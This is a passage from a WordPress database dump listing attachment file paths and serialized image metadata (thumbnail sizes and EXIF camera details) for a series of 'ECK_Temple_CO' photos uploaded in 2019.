-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_035-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_035-lg-250x375.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_035-lg-120x180.jpg\";s:5:\"width\";i:120;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_035-lg-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_035-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_035-lg-309x285.jpg\";s:5:\"width\";i:309;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442657838\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"32\";s:3:\"iso\";s:3:\"320\";s:13:\"shutter_speed\";s:6:\"0.0125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25819,165253,'_wp_attached_file','2019/09/ECK_Temple_CO_036-lg.jpg'),(25820,165253,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:618;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/09/ECK_Temple_CO_036-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_036-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_036-lg-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_036-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_036-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_036-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_036-lg-250x187.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_036-lg-550x412.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:412;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_036-lg-240x180.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_036-lg-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_036-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_036-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"iPhone 6\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442691661\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.15\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25821,165254,'_wp_attached_file','2019/09/ECK_Temple_CO_037-lg.jpg'),(25822,165254,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:698;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/09/ECK_Temple_CO_037-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_037-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_037-lg-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_037-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_037-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_037-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_037-lg-250x166.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:166;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_037-lg-550x365.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:365;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_037-lg-271x180.jpg\";s:5:\"width\";i:271;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_037-lg-452x300.jpg\";s:5:\"width\";i:452;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_037-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_037-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"NEX-5R\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442690591\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"174\";s:3:\"iso\";s:4:\"1600\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25823,165255,'_wp_attached_file','2019/09/ECK_Temple_CO_038-lg.jpg'),(25824,165255,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:618;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/09/ECK_Temple_CO_038-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_038-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_038-lg-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_038-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_038-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_038-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_038-lg-250x187.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_038-lg-550x412.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:412;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_038-lg-240x180.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_038-lg-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_038-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_038-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"DSC-HX200V\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442655627\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.8\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25825,165256,'_wp_attached_file','2019/09/ECK_Temple_CO_039-lg.jpg'),(25826,165256,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:618;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/09/ECK_Temple_CO_039-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_039-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_039-lg-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_039-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_039-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_039-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_039-lg-250x187.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_039-lg-550x412.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:412;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_039-lg-240x180.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_039-lg-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_039-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_039-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"iPhone 6\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442687077\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.15\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25827,165257,'_wp_attached_file','2019/09/ECK_Temple_CO_040-lg.jpg'),(25828,165257,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:618;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/09/ECK_Temple_CO_040-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_040-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_040-lg-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_040-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_040-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_040-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_040-lg-250x187.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_040-lg-550x412.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:412;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_040-lg-240x180.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_040-lg-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_040-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_040-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"iPhone 6\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442660075\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.15\";s:3:\"iso\";s:2:\"32\";s:13:\"shutter_speed\";s:17:\"0.016666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25829,165258,'_wp_attached_file','2019/09/ECK_Temple_CO_041-lg.jpg'),(25830,165258,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:618;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/09/ECK_Temple_CO_041-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_041-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_041-lg-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_041-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_041-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_041-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_041-lg-250x187.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_041-lg-550x412.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:412;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_041-lg-240x180.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_041-lg-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_041-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_041-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"DSC-HX200V\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442657464\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.8\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25831,165259,'_wp_attached_file','2019/09/ECK_Temple_CO_042-lg.jpg'),(25832,165259,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:618;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/09/ECK_Temple_CO_042-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_042-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_042-lg-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_042-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_042-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_042-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_042-lg-250x187.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_042-lg-550x412.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:412;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_042-lg-240x180.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_042-lg-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_042-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_042-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"4.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"DSC-HX200V\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1437832325\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:5:\"16.42\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:4:\"0.01\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25833,165260,'_wp_attached_file','2019/09/ECK_Temple_CO_043-lg.jpg'),(25834,165260,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:618;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/09/ECK_Temple_CO_043-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_043-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_043-lg-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_043-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_043-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_043-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_043-lg-250x187.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_043-lg-550x412.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:412;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_043-lg-240x180.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_043-lg-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_043-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_043-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"iPhone 6\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442700036\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.15\";s:3:\"iso\";s:3:\"125\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25835,165261,'_wp_attached_file','2019/09/ECK_Temple_CO_044-lg.jpg'),(25836,165261,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:618;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/09/ECK_Temple_CO_044-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_044-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_044-lg-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_044-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_044-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_044-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\